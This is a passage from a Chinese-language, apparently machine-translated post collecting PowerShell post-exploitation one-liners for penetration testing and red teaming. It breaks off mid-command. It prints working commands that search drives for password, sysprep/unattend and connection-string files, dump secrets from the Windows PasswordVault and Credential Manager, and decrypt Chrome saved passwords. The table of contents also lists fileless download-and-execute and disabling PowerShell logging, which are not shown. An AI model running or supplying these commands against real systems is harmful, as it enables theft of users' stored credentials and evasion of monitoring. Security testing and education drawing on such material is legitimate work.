powershell渗透-信息收集命令

本文包含从 Internet 的各个角落收集的 PowerShell 命令列表，这些命令在渗透测试或红色团队练习期间可能会有所帮助。
该列表包括各种开发后的单行在纯 PowerShell 不需要任何攻击 （= 可能标记为恶意） 第三方模块， 但也一堆方便的管理命令.
我们开始吧！
目录
隐藏
• 查找包含敏感信息的文件
o 查找可能感兴趣的文件
o 在 Sysprep 或未处理文件中查找凭据
o 查找包含”密码”字符串的配置文件
o 在配置文件中查找数据库凭据
o 查找 Web 服务器配置文件
• 提取凭据
o 从 Windows 密码 Vault 获取存储的密码
o 从 Windows 凭据管理器获取存储的密码
o 从谷歌浏览器转储密码
o 从无线配置文件获取存储的 Wi-Fi 密码
o 在注册表中搜索 SNMP 社区字符串
o 在注册表中搜索字符串模式
• 权限升级
o 搜索自动登录凭据的注册表
o 检查是否启用了”始终安装提升”
o 查找未引用的服务路径
o 检查 Lsass Wdigest 缓存
o SYSVOL 和组策略首选项 （GPP） 中的凭据
• 网络相关命令
o 从命令行设置 MAC 地址
o 允许远程桌面连接
o 使用大容量 DNS 反向查找的主机发现
o 端口扫描主机以寻找有趣的端口
o 端口扫描单个端口的网络（端口扫描）
o 创建来宾 SMB 共享驱动器
o 在 Windows 防火墙中白列出 IP 地址
• 其他有用的命令
o 无文件下载和执行
o 获取当前用户的 SID
o 检查我们运行是否具有提升（管理员）权限
o 禁用 PowerShell 命令日志记录
o 列出已安装的防病毒 （AV） 产品
• 结论
查找包含敏感信息的文件
在开发后阶段，以下 PowerShell 命令可以很方便地查找磁盘上可能包含凭据、配置详细信息和其他敏感信息的文件。
查找可能感兴趣的文件
通过此命令，我们可以根据文件名识别具有潜在敏感数据的文件，如帐户信息、凭据、配置文件等：
gci c:\ -Include pass.txt,pass.xml,pass.ini,pass.xlsx,cred,vnc,.config,accounts -File -Recurse -EA SilentlyContinue
虽然这会产生很多噪音，但也会产生一些非常有趣的结果。
建议对每个磁盘驱动器进行此操作，但您也可以在 c：\用户文件夹上运行它，以便获得一些快速获胜。
在 Sysprep 或未处理文件中查找凭据
此命令将查找自动安装和自动配置的残余，这些残余可能包含纯文本密码或 base64 编码密码：
gci c:\ -Include sysprep.inf,sysprep.xml,sysprep.txt,unattended.xml,unattend.xml,unattend.txt -File -Recurse -EA SilentlyContinue
这是众所周知的特权升级技术之一，因为密码通常是本地管理员密码。
建议对每个磁盘驱动器进行此设置。
查找包含”密码”字符串的配置文件
通过此命令，我们可以找到包含特定模式的文件，例如，这里正在寻找各种文本配置文件中的”密码”模式：
gci c:\ -Include .txt,.xml,.config,.conf,.cfg,.ini -File -Recurse -EA SilentlyContinue | Select-String -Pattern “password”
虽然这会产生很多噪音，但也会产生一些有趣的结果。
建议对每个磁盘驱动器进行此设置。
在配置文件中查找数据库凭据
使用以下 PowerShell 命令，我们可以在各种配置文件（如 Web.config）中查找存储在各种配置文件中的数据库连接字符串（具有纯文本凭据），ASP.NET在 Visual Studio 项目文件中等：
gci c:\ -Include .config,.conf,*.xml -File -Recurse -EA SilentlyContinue | Select-String -Pattern “connectionString”
查找连接字符串，例如对于远程 Microsoft SQL Server，可能会导致远程命令执行 （RCE） 使用 xp_cmdshell 功能（链接、链接、链接等）以及随后的横向移动。
查找 Web 服务器配置文件
通过此命令，我们可以轻松地找到属于 Microsoft IIS、XAMPP、Apache、PHP 或 MySQL 安装的配置文件：
gci c:\ -Include web.config,applicationHost.config,php.ini,httpd.conf,httpd-xampp.conf,my.ini,my.cnf -File -Recurse -EA SilentlyContinue
这些文件可能包含纯文本密码或其他有趣的信息，可以允许访问其他资源，如数据库，管理接口等。

提取凭据
以下 PowerShell 命令也属于开发后类别，它们可用于在访问 Windows 系统后提取凭据。
从 Windows 密码 Vault 获取存储的密码
使用以下 PowerShell 命令，我们可以从 Windows PasswordVault中提取机密，这是一种用于存储密码和 Web 凭据的 Windows 内置机制，例如用于 Internet 资源管理器、边缘和其他应用程序：
[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];(New-Object Windows.Security.Credentials.PasswordVault).RetrieveAll() | % { $.RetrievePassword();$ }

请注意，保管库通常存储在以下位置，并且只能在当前记录的用户的上下文中检索机密：
• C:\Users<USERNAME>\AppData\Local\Microsoft\Vault
• C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Vault
• C:\ProgramData\Microsoft\Vault
有关 Windows 密码 Vault 的更多信息，请参阅此处。
从 Windows 凭据管理器获取存储的密码
Windows 凭据管理器提供了另一种用于存储凭据以登录到网站、登录到远程系统和各种应用程序的机制，它还提供了在 PowerShell 脚本中使用凭据的安全方法。
使用以下单行，我们可以使用凭据管理器从凭据管理器检索所有存储的凭据：
Get-StoredCredential | % { write-host -NoNewLine $.username; write-host -NoNewLine “:” ; $p = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($.password) ; [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($p); }

与PasswordVault类似，凭据存储在单个用户配置文件位置，只有当前记录的用户才能解密其：
• C:\Users<USERNAME>\AppData\Local\Microsoft\Credentials
• C:\Users<USERNAME>\AppData\Roaming\Microsoft\Credentials
• C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\

从谷歌浏览器转储密码
以下命令从 Google Chrome 浏览器（如果已安装）以及存储任何密码时提取存储的凭据：
[System.Text.Encoding]::UTF8.GetString([System.Security.Cryptography.ProtectedData]::Unprotect($datarow.password_value,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser))
同样，这必须在目标（受害者）用户的上下文中执行。
从无线配置文件获取存储的 Wi-Fi 密码
通过此命令，我们可以从 Windows 系统中配置的无线配置文件中提取所有存储的 Wi-Fi 密码（WEP、WPA PSK、WPA2 PSK 等） ：
(netsh wlan show profiles) | Select-String “